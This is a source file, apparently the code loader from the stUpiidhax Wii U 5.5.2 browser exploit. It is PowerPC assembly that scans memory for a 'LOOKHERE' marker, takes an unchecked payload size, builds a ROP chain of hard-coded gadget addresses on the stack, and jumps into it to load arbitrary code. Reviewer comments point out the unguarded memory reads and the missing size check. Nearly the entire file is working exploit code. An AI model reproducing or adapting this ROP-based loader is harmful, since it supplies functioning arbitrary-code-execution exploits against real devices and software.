stUpiidhax, the Wii U 5.5.2 exploit (based on JSTypeHax) http://stupiid.ovh/

codeloader.s 4.1KB

  1. # codeloader.s -- 32-bit big-endian PowerPC (GAS syntax, '#' comments). Scans a fixed memory range
  2. # for the 8-byte magic "LOOKHERE", then stages a ROP chain that copies the bytes following the magic.
  3. # Payload layout expected in memory (fields packed, all big-endian):
  4. #   struct PAYLOAD {
  5. #     char   magic[8];   // "LOOKHERE"        (offset 0x0)
  6. #     uint32 size;       // byte count of code (offset 0x8)
  7. #     byte   code[size]; // raw PPC to load    (offset 0xC)
  8. #   }
  9. # Register aliases so the source does not depend on the assembler's -mregnames option.
  10. .set r0, 0
  11. .set r1, 1
  12. .set r2, 2
  13. .set r3, 3
  14. .set r4, 4
  15. .set r5, 5
  16. .set r6, 6
  17. .set r7, 7
  18. .set r8, 8
  19. .set r9, 9
  20. .set r10, 10
  21. .set r11, 11
  22. .set r12, 12
  23. .set r13, 13
  24. .set r14, 14
  25. .set r15, 15
  26. .set r16, 16
  27. .set r17, 17
  28. .set r18, 18
  29. .set r19, 19
  30. .set r20, 20
  31. .set r21, 21
  32. .set r22, 22
  33. .set r23, 23
  34. .set r24, 24
  35. .set r25, 25
  36. .set r26, 26
  37. .set r27, 27
  38. .set r28, 28
  39. .set r29, 29
  40. .set r30, 30
  41. .set r31, 31
  42. # Scan bounds. Register roles from here on: r7 = scan cursor (later: payload code address), r8 = exclusive end of the range, r9/r10 = the two magic words, r11 = word just loaded (later: payload size). Nothing below checks that the pages in the range are mapped, so the lwz in loop_start faults if an unmapped page lies inside it.
  43. lis r7, 0x1B00 # r7 = 0x1B000000 (NOTE(review): the original header/comment said 1C000000; lis 0x1B00 actually yields 1B000000 -- confirm which bound is intended)
  44. lis r8, 0x1D00 # r8 = 0x1D000000; the scan stops once r7 >= r8
  45. # r9 = 0x4C4F4F4B = "LOOK" as one big-endian word
  46. lis r9, 0x4C4F # "LO"
  47. ori r9, r9, 0x4F4B # "OK"
  48. # r10 = 0x48455245 = "HERE" as one big-endian word
  49. lis r10, 0x4845 # "HE"
  50. ori r10, r10, 0x5245 # "RE"
  51. loop_start:
  52. # Loop invariant: r7 is 4-byte aligned and r7 < r8. Compare the word at r7 with "LOOK".
  53. lwz r11, 0(r7) # r11 = *(uint32 *)r7 -- unguarded read
  54. cmpw r11, r9
  55. bne not_equal # first word differs: advance the cursor
  56. # First word matched; compare the following word with "HERE"
  57. lwz r11, 4(r7) # r11 = *(uint32 *)(r7 + 4)
  58. cmpw r11, r10
  59. beq found # full 8-byte magic matched: r7 points at PAYLOAD.magic
  60. # Either word differed: fall through and advance
  61. not_equal:
  62. # Word-granular scan, so the magic is only found when it starts on a 4-byte boundary
  63. addi r7, r7, 4 # r7 += 4
  64. cmpw r7, r8 # signed compare; adequate here because both bounds are below 0x80000000
  65. bge not_found # r7 >= r8: end of range without a match
  66. b loop_start # still in range: examine the next word
  67. found:
  68. # r7 -> PAYLOAD. Read the size field and advance r7 to the code bytes. The size is taken as-is: no upper bound or sanity check is applied before it is handed to the ROP chain below.
  69. lwz r11, 8(r7) # r11 = PAYLOAD.size
  70. addi r7, r7, 0xC # r7 = &PAYLOAD.code[0]
  71. # Build the ROP chain in the current stack frame (offsets relative to r1): the copy into codegen cannot run from JIT memory, so control is handed to pre-existing code instead. The constants stored below are gadget addresses and arguments produced by ropChainToAsm.py; what each slot means is not recoverable from this file alone.
  72. # First clear every slot the chain uses (0x0 .. 0x158), then fill the non-zero slots.
  73. li r10, 0x0000 # r10 = 0 (filler for the cleared slots)
  74. stw r10, 0x0(r1)
  75. stw r10, 0x8(r1)
  76. stw r10, 0xC(r1)
  77. stw r10, 0x10(r1)
  78. stw r10, 0x14(r1)
  79. stw r10, 0x18(r1)
  80. stw r10, 0x24(r1)
  81. stw r10, 0x28(r1)
  82. stw r10, 0x2C(r1)
  83. stw r10, 0x30(r1)
  84. stw r10, 0x38(r1)
  85. stw r10, 0x3C(r1)
  86. stw r10, 0x40(r1)
  87. stw r10, 0x44(r1)
  88. stw r10, 0x48(r1)
  89. stw r10, 0x50(r1)
  90. stw r10, 0x54(r1)
  91. stw r10, 0x58(r1)
  92. stw r10, 0x60(r1)
  93. stw r10, 0x70(r1)
  94. stw r10, 0x78(r1)
  95. stw r10, 0x80(r1)
  96. stw r10, 0x84(r1)
  97. stw r10, 0x88(r1)
  98. stw r10, 0x8C(r1)
  99. stw r10, 0x90(r1)
  100. stw r10, 0x98(r1)
  101. stw r10, 0x9C(r1)
  102. stw r10, 0xA0(r1)
  103. stw r10, 0xA4(r1)
  104. stw r10, 0xA8(r1)
  105. stw r10, 0xB8(r1)
  106. stw r10, 0xBC(r1)
  107. stw r10, 0xC0(r1)
  108. stw r10, 0xC8(r1)
  109. stw r10, 0xCC(r1)
  110. stw r10, 0xD0(r1)
  111. stw r10, 0xD4(r1)
  112. stw r10, 0xD8(r1)
  113. stw r10, 0xE0(r1)
  114. stw r10, 0xE4(r1)
  115. stw r10, 0xE8(r1)
  116. stw r10, 0xEC(r1)
  117. stw r10, 0xF0(r1)
  118. stw r10, 0x100(r1)
  119. stw r10, 0x108(r1)
  120. stw r10, 0x110(r1)
  121. stw r10, 0x114(r1)
  122. stw r10, 0x118(r1)
  123. stw r10, 0x11C(r1)
  124. stw r10, 0x120(r1)
  125. stw r10, 0x128(r1)
  126. stw r10, 0x12C(r1)
  127. stw r10, 0x130(r1)
  128. stw r10, 0x134(r1)
  129. stw r10, 0x138(r1)
  130. stw r10, 0x148(r1)
  131. stw r10, 0x150(r1)
  132. stw r10, 0x158(r1)
  133. li r10, 0x0001 # slot 0xB4 = 1
  134. stw r10, 0xB4(r1)
  135. lis r10, 0x0102 # r10 = 0x010204C8; stored at 0x4, 0x4C, 0x94, 0xDC, 0x124 (0x4 is the slot the final lwz/mtlr/blr jumps through)
  136. ori r10, r10, 0x04C8
  137. stw r10, 0x4(r1)
  138. stw r10, 0x4C(r1)
  139. stw r10, 0x94(r1)
  140. stw r10, 0xDC(r1)
  141. stw r10, 0x124(r1)
  142. lis r10, 0x0102 # r10 = 0x01023F88; stored at 0xF8
  143. ori r10, r10, 0x3F88
  144. stw r10, 0xF8(r1)
  145. lis r10, 0x0102 # r10 = 0x010240B0; stored at 0x140
  146. ori r10, r10, 0x40B0
  147. stw r10, 0x140(r1)
  148. lis r10, 0x0103 # r10 = 0x01035FC8; stored at 0x68
  149. ori r10, r10, 0x5FC8
  150. stw r10, 0x68(r1)
  151. lis r10, 0x0103 # r10 = 0x010376C0; stored at 0x20, 0xB0
  152. ori r10, r10, 0x76C0
  153. stw r10, 0x20(r1)
  154. stw r10, 0xB0(r1)
  155. lis r10, 0x0107 # r10 = 0x0107DD70; stored at 0x1C, 0x64, 0xAC, 0xF4, 0x13C
  156. ori r10, r10, 0xDD70
  157. stw r10, 0x1C(r1)
  158. stw r10, 0x64(r1)
  159. stw r10, 0xAC(r1)
  160. stw r10, 0xF4(r1)
  161. stw r10, 0x13C(r1)
  162. lis r10, 0x0108 # r10 = 0x01080274; stored at 0x34, 0x7C, 0xC4, 0x10C, 0x154
  163. ori r10, r10, 0x0274
  164. stw r10, 0x34(r1)
  165. stw r10, 0x7C(r1)
  166. stw r10, 0xC4(r1)
  167. stw r10, 0x10C(r1)
  168. stw r10, 0x154(r1)
  169. lis r10, 0x0180 # r10 = 0x01800000; stored at 0x6C, 0xFC, 0x144, 0x15C
  170. stw r10, 0x6C(r1)
  171. stw r10, 0xFC(r1)
  172. stw r10, 0x144(r1)
  173. stw r10, 0x15C(r1)
  174. stw r7, 0x74(r1) # slot 0x74 = address of PAYLOAD.code
  175. stw r11, 0x5C(r1) # slots 0x5C, 0x104, 0x14C = PAYLOAD.size (unchecked, see above)
  176. stw r11, 0x104(r1)
  177. stw r11, 0x14C(r1)
  178. # Start the chain: load the value just stored at 0x4(r1) into LR and return into it. NOTE(review): 0x4(r1) is presumably this frame's LR save word, so no further unwinding happens before the first gadget runs -- confirm against the caller's frame layout.
  179. lwz r0, 0x4(r1) # r0 = 0x010204C8
  180. mtlr r0
  181. blr # does not return here
  182. not_found:
  183. blr # no payload found: return to the caller (what happens next is up to the caller)